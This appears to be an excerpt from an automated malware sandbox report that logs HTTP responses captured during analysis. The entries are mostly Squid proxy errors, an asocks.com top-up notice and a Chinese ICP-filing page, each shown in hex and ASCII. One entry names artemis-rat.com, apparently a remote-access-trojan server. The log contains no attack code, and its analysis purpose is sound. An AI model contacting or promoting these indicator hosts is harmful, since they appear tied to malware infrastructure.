                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:03 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:03 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:04 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:04 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:00 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 